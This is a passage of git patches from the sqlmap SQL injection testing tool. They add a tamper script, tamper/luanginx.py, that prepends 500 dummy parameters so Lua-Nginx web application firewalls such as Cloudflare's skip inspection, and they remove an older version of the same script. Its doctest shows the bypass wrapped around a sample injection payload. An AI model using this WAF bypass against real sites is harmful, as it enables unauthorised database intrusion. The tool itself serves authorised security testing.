PRIORITY +from lib.core.data import conf +__priority__ = PRIORITY.HIGHEST + +''' Random parameter''' +def randomParameterGenerator(size=6, chars=string.ascii_uppercase + string.digits): + output = ''.join(random.choice(chars) for _ in range(size)) + return output + +''' Tamper ''' +def tamper(payload, **kwargs): + try: + headers = kwargs.get("headers", {}) + randomParameter = randomParameterGenerator() + parameter = conf["testParameter"][0] + + if not parameter: + print "\n[-] [ERROR] Add an injectable parameter with -p option (-p param)" + sys.exit(0) + + if conf["skipUrlEncode"] != True: + print "\n[-] [ERROR] --skip-urlencode option must be activated" + sys.exit(0) + + # Add 500 parameters to payload + luaBypass = ("&" + randomParameter + "=")*500 + "&" + outputPayload = luaBypass + parameter + "=" + payload + + return outputPayload + except Exception as error: + print error + return None From 48b407c0fab343f66c4ad40f69a5d6cf209cb21f Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 26 Oct 2018 12:08:04 +0200 Subject: [PATCH 337/428] Updates regarding the #3316 --- doc/THANKS.md | 3 +++ lib/core/enums.py | 4 ++++ lib/core/settings.py | 2 +- lib/request/connect.py | 14 +++++++++++++- txt/checksum.md5 | 6 +++--- 5 files changed, 24 insertions(+), 5 deletions(-) diff --git a/doc/THANKS.md b/doc/THANKS.md index 94a32b480d0..e9e20cfdf3d 100644 --- a/doc/THANKS.md +++ b/doc/THANKS.md @@ -565,6 +565,9 @@ Efrain Torres, * for helping out to improve the Metasploit Framework sqlmap auxiliary module and for committing it on the Metasploit official subversion repository * for his great Metasploit WMAP Framework +Jennifer Torres, +* for contributing a tamper script luanginxwafbypass.py + Sandro Tosi, * for helping to create sqlmap Debian package correctly diff --git a/lib/core/enums.py b/lib/core/enums.py index 181cae66c17..45b08c526d1 100644 --- a/lib/core/enums.py +++ b/lib/core/enums.py @@ -378,3 +378,7 @@ class TIMEOUT_STATE: NORMAL = 0 EXCEPTION = 1 TIMEOUT = 2 + +class HINT: + PREPEND = 0 + APPEND = 1 \ No newline at end of file diff --git a/lib/core/settings.py b/lib/core/settings.py index 291931dca81..1b8cff3964a 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.30" +VERSION = "1.2.10.31" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/connect.py b/lib/request/connect.py index d15a2c4d814..0c0067f4407 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -69,6 +69,7 @@ class WebSocketException(Exception): from lib.core.enums import ADJUST_TIME_DELAY from lib.core.enums import AUTH_TYPE from lib.core.enums import CUSTOM_LOGGING +from lib.core.enums import HINT from lib.core.enums import HTTP_HEADER from lib.core.enums import HTTPMETHOD from lib.core.enums import NULLCONNECTION @@ -816,10 +817,14 @@ def queryPage(value=None, place=None, content=False, getRatioValue=False, silent conf.httpHeaders.append((HTTP_HEADER.CONTENT_TYPE, contentType)) if payload: + delimiter = conf.paramDel or (DEFAULT_GET_POST_DELIMITER if place != PLACE.COOKIE else DEFAULT_COOKIE_DELIMITER) + if not disableTampering and kb.tamperFunctions: for function in kb.tamperFunctions: + hints = {} + try: - payload = function(payload=payload, headers=auxHeaders) + payload = function(payload=payload, headers=auxHeaders, delimiter=delimiter, hints=hints) except Exception, ex: errMsg = "error occurred while running tamper " errMsg += "function '%s' ('%s')" % (function.func_name, getSafeExString(ex)) @@ -832,6 +837,13 @@ def queryPage(value=None, place=None, content=False, getRatioValue=False, silent value = agent.replacePayload(value, payload) + if hints: + if HINT.APPEND in hints: + value = "%s%s%s" % (value, delimiter, hints[HINT.APPEND]) + + if HINT.PREPEND in hints: + value = "%s%s%s" % (hints[HINT.PREPEND], delimiter, value) + logger.log(CUSTOM_LOGGING.PAYLOAD, safecharencode(payload.replace('\\', BOUNDARY_BACKSLASH_MARKER)).replace(BOUNDARY_BACKSLASH_MARKER, '\\')) if place == PLACE.CUSTOM_POST and kb.postHint: diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 843620ab7a1..fa2c02401be 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -37,7 +37,7 @@ ce7fb7270b104f05d1e2be088b69c976 lib/core/common.py fbb55cc6100318ff922957b6577dc58f lib/core/defaults.py ac7c070b2726d39fbac1916b1a5f92b2 lib/core/dicts.py 760de985e09f5d11aacd3a8f2d8e9ff2 lib/core/dump.py -ee7da34f4947739778a07d6c9c05ab54 lib/core/enums.py +0cf974cf4ff3b96e1a349a12e39f4693 lib/core/enums.py cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -8abd15c74363a1de79976adeb95fba4a lib/core/settings.py +737cfceb9db54a600e3983ef350f939a lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 47ad325975ab21fc9f11d90b46d0d143 lib/core/target.py @@ -71,7 +71,7 @@ f6b5957bf2103c3999891e4f45180bce lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 2b81435f5a7519298c15c724e3194a0d lib/request/basic.py 859b6ad583e0ffba154f17ee179b5b89 lib/request/comparison.py -35db2a1779b9c71dfa183ac1f8995a5b lib/request/connect.py +95aeaefe56d22290b06c13acb13dfced lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py 98535d0efca5551e712fcc4b34a3f772 lib/request/httpshandler.py From f2035145fe08b9c9fbbc6803e81d9bcffa8c486b Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 26 Oct 2018 12:10:22 +0200 Subject: [PATCH 338/428] Another update related to the #3316 --- doc/THANKS.md | 2 +- lib/core/settings.py | 2 +- tamper/luanginx.py | 36 ++++++++++++++++++++++++++ tamper/luanginxwafbypass.py | 51 ------------------------------------- txt/checksum.md5 | 3 ++- 5 files changed, 40 insertions(+), 54 deletions(-) create mode 100644 tamper/luanginx.py delete mode 100644 tamper/luanginxwafbypass.py diff --git a/doc/THANKS.md b/doc/THANKS.md index e9e20cfdf3d..e9eb7456d55 100644 --- a/doc/THANKS.md +++ b/doc/THANKS.md @@ -566,7 +566,7 @@ Efrain Torres, * for his great Metasploit WMAP Framework Jennifer Torres, -* for contributing a tamper script luanginxwafbypass.py +* for contributing a tamper script luanginx.py Sandro Tosi, * for helping to create sqlmap Debian package correctly diff --git a/lib/core/settings.py b/lib/core/settings.py index 1b8cff3964a..4a61e03ff21 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.31" +VERSION = "1.2.10.32" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/tamper/luanginx.py b/tamper/luanginx.py new file mode 100644 index 00000000000..bca93e16e79 --- /dev/null +++ b/tamper/luanginx.py @@ -0,0 +1,36 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import string +import random + +from lib.core.enums import HINT +from lib.core.enums import PRIORITY +from lib.core.settings import DEFAULT_GET_POST_DELIMITER + +__priority__ = PRIORITY.NORMAL + +def tamper(payload, **kwargs): + """ + LUA-Nginx WAFs Bypass (e.g. Cloudflare) + + Reference: + * https://opendatasecurity.io/cloudflare-vulnerability-allows-waf-be-disabled/ + + Notes: + * Lua-Nginx WAFs do not support processing of more than 100 parameters + + >>> random.seed(0); hints={}; payload = tamper("1 AND 2>1", hints=hints); "%s&%s" % (hints[HINT.PREPEND], payload) + '0U=&Aq=&Fz=&Ws=&DK=&4F=&rU=&Mp=&48=&Y3=&tT=&3Q=&Dg=&AL=&47=&D1=&qX=&Ia=&Sy=&ZP=&aE=&1p=&u1=&lJ=&o7=&XB=&et=&F5=&gI=&RH=&YH=&7L=&KB=&Kx=&Js=&lL=&OD=&fU=&25=&03=&5H=&yR=&rY=&03=&K6=&JB=&O9=&4X=&fL=&EN=&0p=&Th=&nX=&uY=&gj=&Rc=&J4=&HQ=&bN=&LJ=&yw=&8c=&b7=&lh=&nX=&6b=&Ag=&qn=&Ov=&lF=&cg=&9m=&wT=&Z4=&kP=&7d=&P0=&vp=&LB=&kD=&zJ=&Ft=&wZ=&pI=&aT=&uc=&ro=&7v=&rw=&6N=&MS=&yz=&Oa=&lu=&oN=&x2=&Jz=&yR=&zP=&cB=&qj=&GE=&IU=&2E=&tC=&Y2=&Yl=&9N=&fS=&9y=&Qt=&nS=&aZ=&Gg=&hO=&2r=&8g=&0y=&fr=&CX=&1i=&GO=&v2=&rb=&cQ=&I6=&64=&cU=&RO=&S3=&Nx=&Hm=&Ka=&ju=&WS=&uM=&ck=&8r=&yI=&sD=&oc=&lG=&ey=&uz=&g4=&D0=&8v=&DR=&As=&T3=&5M=&x8=&Ne=&fU=&da=&yG=&BE=&KQ=&Aw=&9q=&WA=&wd=&1R=&3B=&Ph=&ym=&c6=&nj=&mx=&Hj=&98=&jz=&Q2=&E4=&tE=&EP=&mL=&nv=&73=&Yc=&jp=&W0=&KS=&Ye=&f1=&cn=&ca=&0u=&jO=&8F=&3F=&JQ=&XU=&9U=&4m=&HL=&ZD=&Xy=&K0=&XO=&al=&Fp=&e1=&6s=&zY=&dN=&hr=&Zd=&cz=&E1=&SP=&j9=&zL=&xc=&Dj=&cM=&Ng=&Iv=&xW=&E2=&LC=&Nu=&hQ=&MW=&h4=&X4=&2Q=&YG=&Wl=&WB=&UC=&We=&c5=&E3=&6P=&Jn=&fY=&3W=&RA=&sh=&AJ=&56=&zg=&VT=&bB=&Qb=&47=&Se=&ew=&bv=&a8=&Ye=&3m=&mP=&6h=&aw=&bL=&1l=&gv=&7i=&7w=&Ds=&67=&Nl=&9g=&Kj=&36=&Xt=&pU=&sA=&ci=&be=&eA=&IT=&iA=&Nf=&Bw=&6d=&zT=&tm=&sD=&6X=&rI=&QX=&By=&VA=&pC=&6i=&CN=&Dm=&aR=&Ma=&sV=&MH=&jR=&DQ=&Vo=&Vr=&9h=&2c=&pG=&Ky=&gp=&rU=&4K=&cX=&sv=&Gp=&5k=&zr=&GJ=&MG=&zN=&zW=&Ws=&xM=&jR=&xK=&iP=&vD=&zD=&Rt=&Od=&sU=&dM=&bD=&3a=&Ge=&1Q=&UP=&ac=&M9=&2R=&To=&Ur=&gC=&uk=&A3=&AB=&RG=&i4=&BW=&yY=&yn=&m6=&Kd=&yo=&fl=&dN=&kL=&LR=&Fr=&2v=&CN=&F7=&75=&5K=&ER=&nq=&ck=&aO=&iW=&Q8=&y5=&Cv=&g2=&Xu=&Cu=&bc=&wm=&Gl=&mP=&Tt=&1p=&vS=&c5=&eC=&Sc=&Y8=&Ch=&fg=&Vz=&4B=&eA=&UZ=&cl=&Eh=&25=&tA=&Ir=&Hm=&sB=&LH=&qo=&hW=&gT=&pr=&TO=&TF=&1h=&Oh=&Tw=&PR=&On=&Zo=&GP=&oM=&rk=&YI=&uK=&bi=&y8=&Fe=&VW=&WJ=&Rn=&TY=&Vv=&KM=&3g=&ZG=&wC=&an=&OE=&7D=&t0=&qL=&RY=&Wx=&dc=&T7=&vB=&SO=&qP=&sw=&HT=&jb=&Mb=&cn=&Oe=&d8=&A3=&nA=&wk=&u9=&Ux=&zq=>=&QC=&c5=&zy=&ai=&1F=&Tj=&u0=&Yp=&bY=&kW=&Qk=&e5=&LM=&Cj=&Lp=&XT=&b5=&cf=&sj=&ow=&Tz=&qE=&yt=&3I=&8V=&Jq=&QC=&Sz=&Eb=&Tc=&QK=&Wr=&Qm=&Gv=&8m=&Ju=&85=&KS=&Qv=&43=&uU=&aY=&J7=&wM=&uW=&L9=&ai=&ch=&56=&D6=&YW=&Ul=&1 AND 2>1' + """ + + hints = kwargs.get("hints", {}) + delimiter = kwargs.get("delimiter", DEFAULT_GET_POST_DELIMITER) + + hints[HINT.PREPEND] = delimiter.join("%s=" % "".join(random.sample(string.letters + string.digits, 2)) for _ in xrange(500)) + + return payload diff --git a/tamper/luanginxwafbypass.py b/tamper/luanginxwafbypass.py deleted file mode 100644 index 5b694545b69..00000000000 --- a/tamper/luanginxwafbypass.py +++ /dev/null @@ -1,51 +0,0 @@ -#!/usr/bin/env python -# -*- coding: utf-8 -*- - -""" -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) -See the file 'LICENSE' for copying permission -""" - -''' -[+] LUA-Nginx WAFs Bypass (Cloudflare) -Lua-Nginx WAFs doesn't support processing for more than 100 parameters. - -Example: sqlmap -r file.txt --tamper=luanginxwafbypass.py --dbs --skip-urlencode -p vulnparameter -Required options: --skip-urlencode, -p -''' - -import sys -import string -import random -from lib.core.enums import PRIORITY -from lib.core.data import conf -__priority__ = PRIORITY.HIGHEST - -''' Random parameter''' -def randomParameterGenerator(size=6, chars=string.ascii_uppercase + string.digits): - output = ''.join(random.choice(chars) for _ in range(size)) - return output - -''' Tamper ''' -def tamper(payload, **kwargs): - try: - headers = kwargs.get("headers", {}) - randomParameter = randomParameterGenerator() - parameter = conf["testParameter"][0] - - if not parameter: - print "\n[-] [ERROR] Add an injectable parameter with -p option (-p param)" - sys.exit(0) - - if conf["skipUrlEncode"] != True: - print "\n[-] [ERROR] --skip-urlencode option must be activated" - sys.exit(0) - - # Add 500 parameters to payload - luaBypass = ("&" + randomParameter + "=")*500 + "&" - outputPayload = luaBypass + parameter + "=" + payload - - return outputPayload - except Exception as error: - print error - return None diff --git a/txt/checksum.md5 b/txt/checksum.md5 index fa2c02401be..31960d072ab 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -737cfceb9db54a600e3983ef350f939a lib/core/settings.py +47482757115424a7155720ee7d3e0ced lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 47ad325975ab21fc9f11d90b46d0d143 lib/core/target.py @@ -261,6 +261,7 @@ ef0639557a79e57b06296c4bc223ebef tamper/htmlencode.py 1e5532ede194ac9c083891c2f02bca93 tamper/__init__.py 2dc49bcd6c55f4e2322b07fa92685356 tamper/least.py 40d1ea0796fd91cb3cdd602e36daed15 tamper/lowercase.py +a54b361da0ac6988d0b97bc79463615d tamper/luanginx.py 1c4d622d1c2c77fc3db1f8b3849467ee tamper/modsecurityversioned.py f177a624c2cd3431c433769c6eb995e7 tamper/modsecurityzeroversioned.py 91b63afdb96b1d51c12a14cbd425d310 tamper/multiplespaces.py From 83081b5e14fec25b7bf1b6e615532d1c437b4361 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 26 Oct 2018 14:00:51 +0200 Subject: [PATCH 339/428] Minor patch related to the #3316 --- lib/core/settings.py | 2 +- lib/request/connect.py | 7 ++++++- txt/checksum.md5 | 4 ++-- 3 files changed, 9 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 4a61e03ff21..010aed678b5 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.32" +VERSION = "1.2.10.33" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/connect.py b/lib/request/connect.py index 0c0067f4407..762b461cf70 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -842,7 +842,12 @@ def queryPage(value=None, place=None, content=False, getRatioValue=False, silent value = "%s%s%s" % (value, delimiter, hints[HINT.APPEND]) if HINT.PREPEND in hints: - value = "%s%s%s" % (hints[HINT.PREPEND], delimiter, value) + if place == PLACE.URI: + match = re.search(r"\w+\s*=\s*%s" % PAYLOAD_DELIMITER, value) or re.search(r"[^?%s/]=\s*%s" % (re.escape(delimiter), PAYLOAD_DELIMITER), value) + if match: + value = value.replace(match.group(0), "%s%s%s" % (hints[HINT.PREPEND], delimiter, match.group(0))) + else: + value = "%s%s%s" % (hints[HINT.PREPEND], delimiter, value) logger.log(CUSTOM_LOGGING.PAYLOAD, safecharencode(payload.replace('\\', BOUNDARY_BACKSLASH_MARKER)).replace(BOUNDARY_BACKSLASH_MARKER, '\\')) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 31960d072ab..c46e2c753c5 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -47482757115424a7155720ee7d3e0ced lib/core/settings.py +0114b3012ea0ce300cf6ea339e8d54ef lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 47ad325975ab21fc9f11d90b46d0d143 lib/core/target.py @@ -71,7 +71,7 @@ f6b5957bf2103c3999891e4f45180bce lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 2b81435f5a7519298c15c724e3194a0d lib/request/basic.py 859b6ad583e0ffba154f17ee179b5b89 lib/request/comparison.py -95aeaefe56d22290b06c13acb13dfced lib/request/connect.py +0363fb0b3e58467ff5c915d1d85dfd3e lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py 98535d0efca5551e712fcc4b34a3f772 lib/request/httpshandler.py From 92febd22a89a7827925e20c4d3375910d38882e1 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 26 Oct 2018 23:01:19 +0200 Subject: [PATCH 340/428] Minor update --- lib/controller/controller.py | 3 ++- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 4 deletions(-) diff --git a/lib/controller/controller.py b/lib/controller/controller.py index a5f15ea3956..c63d7862a6b 100644 --- a/lib/controller/controller.py +++ b/lib/controller/controller.py @@ -60,6 +60,7 @@ from lib.core.exception import SqlmapValueException from lib.core.exception import SqlmapUserQuitException from lib.core.settings import ASP_NET_CONTROL_REGEX +from lib.core.settings import CSRF_TOKEN_PARAMETER_INFIXES from lib.core.settings import DEFAULT_GET_POST_DELIMITER from lib.core.settings import EMPTY_FORM_FIELDS_REGEX from lib.core.settings import IGNORE_PARAMETERS @@ -510,7 +511,7 @@ def start(): logger.info(infoMsg) # Ignore session-like parameters for --level < 4 - elif conf.level < 4 and (parameter.upper() in IGNORE_PARAMETERS or parameter.upper().startswith(GOOGLE_ANALYTICS_COOKIE_PREFIX)): + elif conf.level < 4 and (parameter.upper() in IGNORE_PARAMETERS or any(_ in parameter.lower() for _ in CSRF_TOKEN_PARAMETER_INFIXES) or parameter.upper().startswith(GOOGLE_ANALYTICS_COOKIE_PREFIX)): testSqlInj = False infoMsg = "ignoring %s parameter '%s'" % (paramType, parameter) diff --git a/lib/core/settings.py b/lib/core/settings.py index 010aed678b5..fb7617d35cf 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.33" +VERSION = "1.2.10.34" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index c46e2c753c5..cc3269e5001 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -24,7 +24,7 @@ b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py c1bccc94522d3425a372dcd57f78418e extra/wafdetectify/wafdetectify.py 3459c562a6abb9b4bdcc36925f751f3e lib/controller/action.py fab20cff41611d4fcb4e426e2c7704da lib/controller/checks.py -250d3cf5ea54b8fe1e91fd611b0044ab lib/controller/controller.py +dd42ef140ffc0bd517128e6df369ab01 lib/controller/controller.py 97a0f363bfc33a5ee4853cdf91515423 lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py cb865cf6eff60118bc97a0f106af5e4d lib/core/agent.py @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -0114b3012ea0ce300cf6ea339e8d54ef lib/core/settings.py +6a4002715dd3a6e636aee4b6b081c583 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 47ad325975ab21fc9f11d90b46d0d143 lib/core/target.py From 1e7dfe11b4cb6a155ee1e7390441e832727945c6 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 26 Oct 2018 23:38:37 +0200 Subject: [PATCH 341/428] Fixes #3318 --- lib/core/option.py | 11 ----------- lib/core/settings.py | 2 +- lib/core/target.py | 5 +++++ txt/checksum.md5 | 6 +++--- 4 files changed, 9 insertions(+), 15 deletions(-) diff --git a/lib/core/option.py b/lib/core/option.py index d033ffdeb10..379eed0ddc0 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -45,7 +45,6 @@ from lib.core.common import openFile from lib.core.common import parseRequestFile from lib.core.common import parseTargetDirect -from lib.core.common import parseTargetUrl from lib.core.common import paths from lib.core.common import randomStr from lib.core.common import readCachedFileContent @@ -104,7 +103,6 @@ from lib.core.settings import DEFAULT_TOR_HTTP_PORTS from lib.core.settings import DEFAULT_TOR_SOCKS_PORTS from lib.core.settings import DUMMY_URL -from lib.core.settings import INJECT_HERE_REGEX from lib.core.settings import IS_WIN from lib.core.settings import KB_CHARS_BOUNDARY_CHAR from lib.core.settings import KB_CHARS_LOW_FREQUENCY_ALPHABET @@ -1533,14 +1531,6 @@ def _cleanupOptions(): if conf.optimize: setOptimize() - match = re.search(INJECT_HERE_REGEX, conf.data or "") - if match: - kb.customInjectionMark = match.group(0) - - match = re.search(INJECT_HERE_REGEX, conf.url or "") - if match: - kb.customInjectionMark = match.group(0) - if conf.os: conf.os = conf.os.capitalize() @@ -2486,7 +2476,6 @@ def init(): _resolveCrossReferences() _checkWebSocket() - parseTargetUrl() parseTargetDirect() if any((conf.url, conf.logFile, conf.bulkFile, conf.sitemapUrl, conf.requestFile, conf.googleDork, conf.liveTest)): diff --git a/lib/core/settings.py b/lib/core/settings.py index fb7617d35cf..1d87a2806ba 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.34" +VERSION = "1.2.10.35" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/core/target.py b/lib/core/target.py index 66f237dc87b..2a6926816f3 100644 --- a/lib/core/target.py +++ b/lib/core/target.py @@ -52,9 +52,11 @@ from lib.core.option import _setAuthCred from lib.core.settings import ASTERISK_MARKER from lib.core.settings import CSRF_TOKEN_PARAMETER_INFIXES +from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR from lib.core.settings import DEFAULT_GET_POST_DELIMITER from lib.core.settings import HOST_ALIASES from lib.core.settings import ARRAY_LIKE_RECOGNITION_REGEX +from lib.core.settings import INJECT_HERE_REGEX from lib.core.settings import JSON_RECOGNITION_REGEX from lib.core.settings import JSON_LIKE_RECOGNITION_REGEX from lib.core.settings import MULTIPART_RECOGNITION_REGEX @@ -752,6 +754,9 @@ class _(unicode): setattr(conf.data, UNENCODED_ORIGINAL_VALUE, original) kb.postSpaceToPlus = '+' in original + match = re.search(INJECT_HERE_REGEX, conf.data or "") or re.search(INJECT_HERE_REGEX, conf.url or "") + kb.customInjectionMark = match.group(0) if match else CUSTOM_INJECTION_MARK_CHAR + def setupTargetEnv(): _createTargetDirs() _setRequestParams() diff --git a/txt/checksum.md5 b/txt/checksum.md5 index cc3269e5001..2ce719f56d3 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -42,17 +42,17 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py 7d6edc552e08c30f4f4d49fa93b746f1 lib/core/optiondict.py -2f2b2286f82028cf36ace9be3af06bf9 lib/core/option.py +18f33e43a09f5d682b92ca63baacd531 lib/core/option.py c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 6783160150b4711d02c56ee2beadffdb lib/core/profiling.py 6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -6a4002715dd3a6e636aee4b6b081c583 lib/core/settings.py +31e606e7847cb86495bde3d5d0b18e8a lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py -47ad325975ab21fc9f11d90b46d0d143 lib/core/target.py +721198b5be72c8015a02acb116532a1f lib/core/target.py 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py cd0067d1798e45f422ce44b98baf57db lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py From ba1b4c50be9bde330983be48767f86d7ee3a548c Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 26 Oct 2018 23:40:08 +0200 Subject: [PATCH 342/428] Trivial cleanup --- lib/core/settings.py | 2 +- plugins/dbms/h2/fingerprint.py | 3 --- txt/checksum.md5 | 4 ++-- 3 files changed, 3 insertions(+), 6 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 1d87a2806ba..73ff938cb5e 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.35" +VERSION = "1.2.10.36" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/plugins/dbms/h2/fingerprint.py b/plugins/dbms/h2/fingerprint.py index c2a90521c37..ba36ec1a810 100644 --- a/plugins/dbms/h2/fingerprint.py +++ b/plugins/dbms/h2/fingerprint.py @@ -5,11 +5,8 @@ See the file 'LICENSE' for copying permission """ -import re - from lib.core.common import Backend from lib.core.common import Format -from lib.core.common import unArrayizeValue from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 2ce719f56d3..00c2a7fc11b 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -31e606e7847cb86495bde3d5d0b18e8a lib/core/settings.py +12fb6b20891ff3949db01fa2c1c1286a lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 721198b5be72c8015a02acb116532a1f lib/core/target.py @@ -143,7 +143,7 @@ c56f2dabe88fd761a1a9a51e4d104088 plugins/dbms/firebird/syntax.py 79c44d8d0dffc140d38796a32e92a66a plugins/dbms/h2/connector.py 5b99e9a60409f54a140747ce1ca0342f 